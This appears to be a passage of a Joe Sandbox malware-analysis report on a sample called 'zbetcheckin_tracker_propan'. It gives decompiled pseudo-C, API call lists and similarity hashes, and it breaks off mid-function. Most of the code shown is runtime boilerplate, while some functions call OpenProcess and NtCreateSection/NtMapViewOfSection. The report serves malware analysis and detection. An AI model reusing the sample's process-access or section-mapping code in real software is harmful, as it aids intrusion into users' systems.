0x00401855
0x00401876
0x00401884
0x00401890
0x004018a4
0x004018a7
0x004018c8
0x0040184f
0x0040184f
0x004018e6
0x004018f5
0x00401901
0x00401916
0x00401923
0x0040193e
0x00401954
0x00401966
0x00401974
0x00401980
0x0040199c
0x004019b5
0x004019cd
0x004019da

Strings

,, xrefs: 00401836
&, xrefs: 00401809
c, xrefs: 004018A7
,, xrefs: 00401820
%, xrefs: 0040182C

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: %$&$,$,$c
API String ID: 0-1550213316
Opcode ID: 3fba230848996defcb1a6dd82a6496dd0d6758f63d3fb2d4a38a4e77f3bf999c
Instruction ID: 5cbce02fd3f4360d9f7adde614c3f2d91ffbcc962852d34a1898dbb7efe238c8
Opcode Fuzzy Hash: 3fba230848996defcb1a6dd82a6496dd0d6758f63d3fb2d4a38a4e77f3bf999c
Instruction Fuzzy Hash: 63512331D05268CFCB64CFA9C990BEDBBB1AF44308F04C2D9D449BB246DA345A99CF59

Function 00401B9B, Relevance: 6.0, APIs: 4, Instructions: 38

C-Code - Quality: 100%

			E00401B9B() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x405484; // 0x400000
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x405490 = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x40547c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x405478 = _t5;
						 *0x405484 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x405474 = _t6;
						if(_t6 == 0) {
							 *0x405474 =  *0x405474 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401b9c
0x00401baa
0x00401bb2
0x00401bb7
0x00401c09
0x00401c09
0x00401bb9
0x00401bc1
0x00401bc9
0x00401bc9
0x00401c05
0x00401c07
0x00000000
0x00000000
0x00000000
0x00401bc3
0x00401bc5
0x00401bcb
0x00401bcb
0x00401bd0
0x00401bde
0x00401be3
0x00401be9
0x00401bf1
0x00401bf6
0x00401bf8
0x00401bf8
0x00401c02
0x00401bc7
0x00401bc7
0x00000000
0x00401bc7
0x00401bc5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401103,?,00000000), ref: 00401BAA
GetVersion.KERNEL32(?,00000000), ref: 00401BB9
GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401BD0
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401BE9

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
Instruction ID: b1ba45da2a836c28caf9fe751c5d1c8a0abfb3f3948d590c1bdbef6021fc2645
Opcode Fuzzy Hash: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
Instruction Fuzzy Hash: 3DF04FB16846109EEB209F78BF09BDA3BA8E744B62F000136E754FA1F0D37458818F4C

Function 00413BEE, Relevance: 4.6, APIs: 3, Instructions: 82

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413CC9
UnhandledExceptionFilter.KERNEL32(?), ref: 00413CD3
RtlUnwind.KERNEL32(?,00413CFC,00000000,00000000), ref: 00413CF7

Part of subcall function 0040ED95: GetModuleFileNameA.KERNEL32(00000000,00436231,00000104), ref: 0040EE2E
Part of subcall function 0040ED95: GetStdHandle.KERNEL32(000000F4), ref: 0040EEFE
Part of subcall function 0040ED95: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040EF29

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFileFilterUnhandled$HandleModuleNameUnwindWrite
String ID:
API String ID: 967269462-0
Opcode ID: 4f921be9e8fe3147b96b251c6e064c71450b92f8b3a1ba3c66902f2f68fa829c
Instruction ID: 90a89bf87272827b3b159eadd55355efd96bec79567511dedd2883a0d5093d69
Opcode Fuzzy Hash: 4f921be9e8fe3147b96b251c6e064c71450b92f8b3a1ba3c66902f2f68fa829c
Instruction Fuzzy Hash: 03317F71A0034C9ADB30DFA5EC45BCE7BB8FF09714F10402AF908AB291EB759645CB99

Function 00413BEE, Relevance: 4.6, APIs: 3, Instructions: 82

C-Code - Quality: 65%

			E00413BEE(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, intOrPtr _a124, intOrPtr _a128, intOrPtr _a132, intOrPtr _a136, intOrPtr _a140, intOrPtr _a144, intOrPtr _a148, void* _a152, intOrPtr _a156, intOrPtr _a160, signed int _a676, char _a684) {
				char _v40;
				struct _EXCEPTION_POINTERS _v48;
				intOrPtr _v116;
				char _v128;
				char _v684;
				intOrPtr _v816;
				void* __esi;
				void* __ebp;
				signed int _t36;
				intOrPtr _t38;
				void* _t39;
				char* _t40;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				char _t56;
				signed int _t58;
				void* _t61;
				void* _t62;

				_t54 = __edi;
				_t53 = __edx;
				_t50 = __ebx;
				_t58 =  &_v684;
				_t62 = _t61 - 0x328;
				_t36 =  *0x42c4a0; // 0xe190ffa3
				_a676 = _t36 ^ _t58;
				_push(_t56);
				if(( *0x42cbd0 & 0x00000001) != 0) {
					E0040ED95(0xa);
					_pop(_t52);
				}
				_t38 = E00411465();
				_t65 = _t38;
				if(_t38 != 0) {
					_t38 = E00411472(_t50, _t54, _t56, _t65);
					_t52 = 0x16;
				}
				if(( *0x42cbd0 & 0x00000002) != 0) {
					_a136 = _t38;
					_a132 = _t52;
					_a128 = _t53;
					_a124 = _t50;
					_a120 = _t56;
					_a116 = _t54;
					_a160 = ss;
					_a148 = cs;
					_a112 = ds;
					_a108 = es;
					_a104 = fs;
					_a100 = gs;
					asm("pushfd");
					_pop( *_t19);
					_t56 = _a684;
					_t40 =  &_a684;
					_a156 = _t40;
					_v40 = 0x10001;
					_a144 = _t56;
					_a140 =  *((intOrPtr*)(_t40 - 4));
					E0040FE20(_t54,  &_v128, 0, 0x50);
					_t62 = _t62 + 0xc;
					_v48.ExceptionRecord =  &_v128;
					_v128 = 0x40000015;
					_v116 = _t56;
					_v48.ContextRecord =  &_v40;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter( &_v48);
				}
				_t39 = E0040D07D(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t58);
				_push(_t50);
				_push(_t56);
				_push(_t54);
				_push(_t62);
				_push(0);
				_push(0);
				_push(0x413cfc);
				_push(_v816);
				L00416624();
				return _t39;
			}

0x00413bee
0x00413bee
0x00413bee
0x00413bef
0x00413bf6
0x00413bfc
0x00413c03
0x00413c10
0x00413c11
0x00413c15
0x00413c1a
0x00413c1a
0x00413c1b
0x00413c20
0x00413c22
0x00413c26
0x00413c2b
0x00413c2b
0x00413c33
0x00413c39
0x00413c3f
0x00413c45
0x00413c4b
0x00413c4e
0x00413c51
0x00413c54
0x00413c5b
0x00413c62
0x00413c66
0x00413c6a
0x00413c6e
0x00413c72
0x00413c73
0x00413c79
0x00413c7f
0x00413c85
0x00413c8b
0x00413c92
0x00413c9d
0x00413ca9
0x00413cb1
0x00413cb4
0x00413cbc
0x00413cc3
0x00413cc6
0x00413cc9
0x00413cd3
0x00413cd3
0x00413cdb
0x00413ce0
0x00413ce1
0x00413ce2
0x00413ce3
0x00413ce4
0x00413ce7
0x00413ce8
0x00413ce9
0x00413cea
0x00413ceb
0x00413ced
0x00413cef
0x00413cf4
0x00413cf7
0x00413d03

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00413CC9
UnhandledExceptionFilter.KERNEL32(?), ref: 00413CD3
RtlUnwind.KERNEL32(?,00413CFC,00000000,00000000), ref: 00413CF7

Part of subcall function 0040ED95: GetModuleFileNameA.KERNEL32(00000000,00436231,00000104,0040FA78,00000001,00000214), ref: 0040EE2E
Part of subcall function 0040ED95: _strlen.LIBCMT ref: 0040EE5F
Part of subcall function 0040ED95: _strlen.LIBCMT ref: 0040EE6C
Part of subcall function 0040ED95: GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000,76ECE046,00000003,0040EF61,000000FC,0040C732,00000001,00000000,00000000,?,004110A6,0040FA78,00000001), ref: 0040EEFE
Part of subcall function 0040ED95: _strlen.LIBCMT ref: 0040EF1F
Part of subcall function 0040ED95: WriteFile.KERNEL32 ref: 0040EF29

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: _strlen$ExceptionFileFilterUnhandled$HandleModuleNameUnwindWrite
String ID:
API String ID: 2569407725-0
Opcode ID: 8fbf7a16d2a44bbb6335bae5be489ab3ea3a19db2a12ac5c0f6e68ca4ba16b63
Instruction ID: 90a89bf87272827b3b159eadd55355efd96bec79567511dedd2883a0d5093d69
Opcode Fuzzy Hash: 8fbf7a16d2a44bbb6335bae5be489ab3ea3a19db2a12ac5c0f6e68ca4ba16b63
Instruction Fuzzy Hash: 03317F71A0034C9ADB30DFA5EC45BCE7BB8FF09714F10402AF908AB291EB759645CB99

Function 002DE2D6, Relevance: 4.6, APIs: 3, Instructions: 79native

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002DE331
RtlNtStatusToDosError.NTDLL(00000000), ref: 002DE372
NtClose.NTDLL(?), ref: 002DE386

Part of subcall function 002DE297: NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002DE2C4
Part of subcall function 002DE297: RtlNtStatusToDosError.NTDLL(00000000), ref: 002DE2CB

Memory Dump Source

Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ErrorSectionStatus$CloseCreateView
String ID:
API String ID: 2017625107-0
Opcode ID: ae3832c6faef6a21357de7734a98af9dbdc63a7e4b65905de2955db71e83f5b2
Instruction ID: fb24a26b2aa95652a1d39d371ed6dfdbae6f05634206c3c73c02c81dc4029df3
Opcode Fuzzy Hash: ae3832c6faef6a21357de7734a98af9dbdc63a7e4b65905de2955db71e83f5b2
Instruction Fuzzy Hash: B0213C71910219AFCF11EFA8CC859EEBBB9FB48750F110526FA11F7250D7709A14CBA5

Function 002DE297, Relevance: 3.0, APIs: 2, Instructions: 28native

APIs

NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002DE2C4
RtlNtStatusToDosError.NTDLL(00000000), ref: 002DE2CB

Memory Dump Source

Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ErrorSectionStatusView
String ID:
API String ID: 1313840181-0
Opcode ID: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
Instruction ID: d64c79457ae150eb0a106f5442764b7f5bf4f8051d33ed88b86ad0a50613e610
Opcode Fuzzy Hash: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
Instruction Fuzzy Hash: 44E0C0B6910208FFDB059F94DD0ADDF7B7DEB44300F00856AB715A6150E6B0AA189B64

Function 0040276A, Relevance: 3.0, APIs: 2, Instructions: 23

C-Code - Quality: 58%

			E0040276A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _t5;
				long _t6;
				void* _t9;

				_t5 =  *0x405028;
				_t9 = 0;
				if(_t5 == 0) {
					_t6 = 0xc0000002;
					goto L4;
				} else {
					_t6 =  *_t5(_a4, _a8, _a12, 0x318, _a16);
					if(_t6 < 0) {
						L4:
						SetLastError(RtlNtStatusToDosError(_t6));
					} else {
						_t9 = 1;
					}
				}
				return _t9;
			}

0x0040276a
0x00402770
0x00402774
0x00402794
0x00000000
0x00402776
0x0040278b
0x0040278f
0x00402799
0x004027a1
0x00402791
0x00402791
0x00402791
0x0040278f
0x004027aa

APIs

RtlNtStatusToDosError.NTDLL ref: 0040279A
SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004027A1

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: c06b4d4ffea2e640578c3b661d3249466230bb319a2aafee2fe03219a48cdbff
Instruction ID: 619cf60adcc19383fff082a269bac3000d866fccb557d4ed25aad9d60f015b06
Opcode Fuzzy Hash: c06b4d4ffea2e640578c3b661d3249466230bb319a2aafee2fe03219a48cdbff
Instruction Fuzzy Hash: E5E08676204322EBD7014FE49E08E4BBE69AF98782F000835B741F31F1C678C8569BE5

Function 002506F5, Relevance: 2.8, Strings: 2, Instructions: 285

Strings

a, xrefs: 002509C0
, xrefs: 002509CB

Memory Dump Source

Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID: $a
API String ID: 0-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: 23c83684b5d56251109420ffff55496eec61416e142c87e616822649c2bcb8a5
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: 5BC186716183418FC724CF24C8D4A2AB7E1FF88716F15896DE98A9B352C770E859CF4A

Function 002D2BC6, Relevance: 1.9, APIs: 1, Instructions: 610

APIs

memset.NTDLL ref: 002D325D

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: c621025a64a93996d1d85dfdfbf29c8b79bd01e3c7741aae90d62d2e02bcd7eb
Instruction ID: a2f788310c4ee298eadcd6fe760f7503fb4a78392626ceccec26295ca41f87ca
Opcode Fuzzy Hash: c621025a64a93996d1d85dfdfbf29c8b79bd01e3c7741aae90d62d2e02bcd7eb
Instruction Fuzzy Hash: 9522847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Function 00414449, Relevance: 1.8, Strings: 1, Instructions: 517

Strings

, xrefs: 004148E3

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
Instruction ID: 2d1c1fda648c1f10975837b91237ef28666af25bb28fe1228fba60b4b0f928a2
Opcode Fuzzy Hash: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
Instruction Fuzzy Hash: F402F872E105199BDF08CF68D8403EDB3B2FBD9365F25822ED926A72D0C7746A45CB84

Function 00413F07, Relevance: 1.8, Strings: 1, Instructions: 517

Strings

, xrefs: 004143A1

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
Instruction ID: ee01d1faeee44ef12e4e3cf103a29a5988aec0003df79e6e441c58099ca84b5c
Opcode Fuzzy Hash: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
Instruction Fuzzy Hash: 1702EB32E105199BDF04CF59D8403EDB7B2FBD8355F25C26ED926AB280C3746A86CB84

Function 00414449, Relevance: 1.8, Strings: 1, Instructions: 517
Crypto

C-Code - Quality: 92%

			E00414449(signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed short _v32;
				signed int _v36;
				void* _v48;
				signed short* _t231;
				signed int _t236;
				signed int _t239;
				signed int _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t248;
				void* _t249;
				signed int _t253;
				intOrPtr _t254;
				signed int _t256;
				signed int _t258;
				signed int _t261;
				signed int _t265;
				signed int _t268;
				signed int _t273;
				signed int _t277;
				signed int _t280;
				signed int _t281;
				signed int _t285;
				signed int _t286;
				signed int _t289;
				signed int* _t291;
				signed int* _t293;
				signed int* _t294;
				signed int* _t296;
				signed int _t297;
				signed int _t301;
				void* _t302;
				signed char _t303;
				signed int _t307;
				signed int _t316;
				void* _t317;
				intOrPtr _t322;
				signed short* _t324;
				signed int _t331;
				intOrPtr _t332;
				signed int _t340;
				signed int _t341;
				void* _t342;
				signed char _t343;
				signed int _t345;
				signed int _t346;
				signed int _t353;
				void* _t354;
				signed int _t355;
				signed int _t357;
				signed int* _t359;
				signed int _t360;
				signed int* _t361;
				void* _t362;
				signed int _t365;
				signed int* _t367;
				signed int _t368;
				signed int _t369;
				signed int _t372;
				signed int _t375;
				signed int _t376;
				signed int _t382;
				signed int _t383;
				signed int _t388;
				signed int _t389;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t416;
				signed int* _t421;
				unsigned int _t422;
				signed int _t427;
				signed int _t430;
				signed int _t431;
				signed int _t434;
				signed int _t437;
				void* _t438;
				intOrPtr _t447;
				signed int _t448;
				signed int _t451;
				unsigned int _t456;
				unsigned int _t465;
				intOrPtr _t473;
				signed int _t474;
				unsigned int _t475;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				void* _t493;
				void* _t494;

				_t231 = _a4;
				_t297 = _t231[5] & 0x0000ffff;
				_v24 = _t297 & 0x00008000;
				_v36 = _t231[3];
				_t285 = (_t297 & 0x00007fff) - 0x3fff;
				_v32 = _t231[1];
				_v28 = ( *_t231 & 0x0000ffff) << 0x10;
				if(_t285 != 0xffffc001) {
					_a4 = _a4 & 0x00000000;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t447 =  *0x42cc04; // 0x18
					_t448 = _t447 - 1;
					_t17 = _t448 + 1; // 0x18
					_t301 = _t17;
					asm("cdq");
					_t236 = _t301 + (_t369 & 0x0000001f) >> 5;
					_t372 = _t301 & 0x8000001f;
					__eflags = _t372;
					_v20 = _t285;
					_v16 = _t236;
					if(_t372 < 0) {
						_t372 = (_t372 - 0x00000001 | 0xffffffe0) + 1;
						__eflags = _t372;
					}
					_t421 = _t493 + _t236 * 4 - 0x20;
					_t302 = 0x1f;
					_t303 = _t302 - _t372;
					_t239 = 1 << _t303;
					_v12 = _t303;
					__eflags =  *_t421 & 1;
					if(( *_t421 & 1) != 0) {
						_t277 = _v16;
						_t372 =  !((_t372 | 0xffffffff) << _t303);
						__eflags =  *(_t493 + _t277 * 4 - 0x20) & _t372;
						while(__eflags == 0) {
							_t277 = _t277 + 1;
							__eflags = _t277 - 3;
							if(_t277 < 3) {
								__eflags =  *(_t493 + _t277 * 4 - 0x20);
								continue;
							} else {
							}
							goto L25;
						}
						asm("cdq");
						_t365 = 0x1f;
						_t280 = _t448 + (_t372 & _t365) >> 5;
						_t488 = _t448 & 0x8000001f;
						__eflags = _t488;
						if(_t488 < 0) {
							_t488 = (_t488 - 0x00000001 | 0xffffffe0) + 1;
							__eflags = _t488;
						}
						_v8 = _v8 & 0x00000000;
						_t416 = 1 << _t365 - _t488;
						_t367 = _t493 + _t280 * 4 - 0x20;
						_a4 =  *_t367 + 1;
						_t448 =  *_t367;
						__eflags = _a4 - _t448;
						if(_a4 < _t448) {
							L22:
							_v8 = 1;
						} else {
							__eflags = _a4 - _t416;
							L21:
							if(__eflags < 0) {
								goto L22;
							}
						}
						L23:
						_t239 = _t280 - 1;
						__eflags = _t239;
						_t372 = _a4;
						 *_t367 = _t372;
						_t368 = _v8;
						if(_t239 >= 0) {
							__eflags = _t368;
							if(_t368 != 0) {
								_v8 = _v8 & 0x00000000;
								_t367 = _t493 + _t239 * 4 - 0x20;
								_t48 =  *_t367 + 1; // 0x1
								_t448 = _t48;
								__eflags = _t448 -  *_t367;
								_a4 = _t448;
								if(_t448 <  *_t367) {
									goto L22;
								} else {
									__eflags = _t448 - 1;
									goto L21;
								}
								goto L23;
							}
						}
						_a4 = _t368;
					}
					L25:
					 *_t421 =  *_t421 & (_t239 | 0xffffffff) << _v12;
					_t243 = _v16 + 1;
					__eflags = _t243 - 3;
					if(_t243 < 3) {
						_t362 = 3;
						__eflags = 0;
						memset(_t493 + _t243 * 4 - 0x20, 0, _t362 - _t243 << 2);
						_t494 = _t494 + 0xc;
					}
					__eflags = _a4;
					if(_a4 != 0) {
						_t285 = _t285 + 1;
						__eflags = _t285;
					}
					_t244 =  *0x42cc00; // 0xffffff81
					__eflags = _t285 - _t244 -  *0x42cc04;
					if(_t285 >= _t244 -  *0x42cc04) {
						__eflags = _t285 - _t244;
						if(_t285 > _t244) {
							__eflags = _t285 -  *0x42cbfc; // 0x80
							_t307 =  *0x42cc08; // 0x8
							if(__eflags < 0) {
								_t245 =  *0x42cc10; // 0x7f
								_v36 = _v36 & 0x7fffffff;
								_t286 = _t285 + _t245;
								asm("cdq");
								_t248 = _t307 + (_t372 & 0x0000001f) >> 5;
								_t375 = _t307 & 0x8000001f;
								__eflags = _t375;
								if(_t375 < 0) {
									_t375 = (_t375 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t375;
								}
								_v16 = _v16 & 0x00000000;
								_a4 = _a4 & 0x00000000;
								_v8 = 0x20;
								_t197 =  &_v8;
								 *_t197 = _v8 - _t375;
								__eflags =  *_t197;
								_t451 =  !((_t448 | 0xffffffff) << _t375);
								do {
									_t422 =  *(_t493 + _a4 * 4 - 0x20);
									_v20 = _t422 & _t451;
									 *(_t493 + _a4 * 4 - 0x20) = _t422 >> _t375 | _v16;
									_a4 = _a4 + 1;
									__eflags = _a4 - 3;
									_v16 = _v20 << _v8;
								} while (_a4 < 3);
								_t376 = 2;
								_t316 =  &_v28 - (_t248 << 2);
								__eflags = _t316;
								do {
									__eflags = _t376 - _t248;
									if(_t376 < _t248) {
										_t219 = _t493 + _t376 * 4 - 0x20;
										 *_t219 =  *(_t493 + _t376 * 4 - 0x20) & 0x00000000;
										__eflags =  *_t219;
									} else {
										 *(_t493 + _t376 * 4 - 0x20) =  *_t316;
									}
									_t376 = _t376 - 1;
									_t316 = _t316 - 4;
									__eflags = _t376;
								} while (_t376 >= 0);
								_t249 = 0;
								__eflags = 0;
							} else {
								_t427 =  &_v36;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_v36 = _v36 | 0x80000000;
								asm("cdq");
								_t253 = _t307 + (_t372 & 0x0000001f) >> 5;
								_t382 = _t307 & 0x8000001f;
								__eflags = _t382;
								if(_t382 < 0) {
									_t382 = (_t382 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t382;
								}
								_v16 = _v16 & 0x00000000;
								_a4 = _a4 & 0x00000000;
								_v8 = 0x20;
								_t165 =  &_v8;
								 *_t165 = _v8 - _t382;
								__eflags =  *_t165;
								_t430 =  !((_t427 | 0xffffffff) << _t382);
								do {
									_t291 = _t493 + _a4 * 4 - 0x20;
									_t456 =  *_t291;
									_v20 = _t456 & _t430;
									 *_t291 = _t456 >> _t382 | _v16;
									_a4 = _a4 + 1;
									__eflags = _a4 - 3;
									_v16 = _v20 << _v8;
								} while (_a4 < 3);
								_t383 = 2;
								_t331 =  &_v28 - (_t253 << 2);
								__eflags = _t331;
								do {
									__eflags = _t383 - _t253;
									if(_t383 < _t253) {
										_t183 = _t493 + _t383 * 4 - 0x20;
										 *_t183 =  *(_t493 + _t383 * 4 - 0x20) & 0x00000000;
										__eflags =  *_t183;
									} else {
										 *(_t493 + _t383 * 4 - 0x20) =  *_t331;
									}
									_t383 = _t383 - 1;
									_t331 = _t331 - 4;
									__eflags = _t383;
								} while (_t383 >= 0);
								_t254 =  *0x42cbfc; // 0x80
								_t332 =  *0x42cc10; // 0x7f
								_t286 = _t332 + _t254;
								_t249 = 1;
							}
						} else {
							_t256 = _t244 - _v20;
							_t431 =  &_v36;
							asm("movsd");
							asm("cdq");
							asm("movsd");
							_t258 = _t256 + (_t372 & 0x0000001f) >> 5;
							_t388 = _t256 & 0x8000001f;
							__eflags = _t388;
							asm("movsd");
							if(_t388 < 0) {
								_t388 = (_t388 - 0x00000001 | 0xffffffe0) + 1;
								__eflags = _t388;
							}
							_v16 = _v16 & 0x00000000;
							_a4 = _a4 & 0x00000000;
							_v8 = 0x20;
							_t70 =  &_v8;
							 *_t70 = _v8 - _t388;
							__eflags =  *_t70;
							_t434 =  !((_t431 | 0xffffffff) << _t388);
							do {
								_t293 = _t493 + _a4 * 4 - 0x20;
								_t465 =  *_t293;
								_v20 = _t465 & _t434;
								 *_t293 = _t465 >> _t388 | _v16;
								_a4 = _a4 + 1;
								__eflags = _a4 - 3;
								_v16 = _v20 << _v8;
							} while (_a4 < 3);
							_t389 = 2;
							_t340 =  &_v28 - (_t258 << 2);
							__eflags = _t340;
							do {
								__eflags = _t389 - _t258;
								if(_t389 < _t258) {
									_t88 = _t493 + _t389 * 4 - 0x20;
									 *_t88 =  *(_t493 + _t389 * 4 - 0x20) & 0x00000000;
									__eflags =  *_t88;
								} else {
									 *(_t493 + _t389 * 4 - 0x20) =  *_t340;
								}
								_t389 = _t389 - 1;
								_t340 = _t340 - 4;
								__eflags = _t389;
							} while (_t389 >= 0);
							_t473 =  *0x42cc04; // 0x18
							_t474 = _t473 - 1;
							_t94 = _t474 + 1; // 0x18
							_t341 = _t94;
							asm("cdq");
							_t261 = _t341 + (_t389 & 0x0000001f) >> 5;
							_t392 = _t341 & 0x8000001f;
							__eflags = _t392;
							_v16 = _t261;
							if(_t392 < 0) {
								_t392 = (_t392 - 0x00000001 | 0xffffffe0) + 1;
								__eflags = _t392;
							}
							_t342 = 0x1f;
							_t343 = _t342 - _t392;
							_t395 = 1 << _t343;
							_t294 = _t493 + _t261 * 4 - 0x20;
							_v20 = _t343;
							__eflags =  *_t294 & 1;
							if(( *_t294 & 1) != 0) {
								_t395 =  !((_t395 | 0xffffffff) << _t343);
								__eflags =  *(_t493 + _t261 * 4 - 0x20) & 1;
								while(__eflags == 0) {
									_t261 = _t261 + 1;
									__eflags = _t261 - 3;
									if(_t261 < 3) {
										__eflags =  *(_t493 + _t261 * 4 - 0x20);
										continue;
									} else {
									}
									goto L61;
								}
								asm("cdq");
								_t357 = 0x1f;
								_t273 = _t474 + (_t395 & _t357) >> 5;
								_t483 = _t474 & 0x8000001f;
								__eflags = _t483;
								if(_t483 < 0) {
									_t483 = (_t483 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t483;
								}
								_a4 = _a4 & 0x00000000;
								_t395 = 1 << _t357 - _t483;
								_t359 = _t493 + _t273 * 4 - 0x20;
								_t484 =  *_t359;
								_t434 = _t484 + 1;
								__eflags = _t434 - _t484;
								if(_t434 < _t484) {
									L53:
									_a4 = 1;
								} else {
									__eflags = _t434 - 1;
									if(_t434 < 1) {
										goto L53;
									}
								}
								 *_t359 = _t434;
								_t360 = _a4;
								while(1) {
									_t261 = _t273 - 1;
									__eflags = _t261;
									if(_t261 < 0) {
										goto L61;
									}
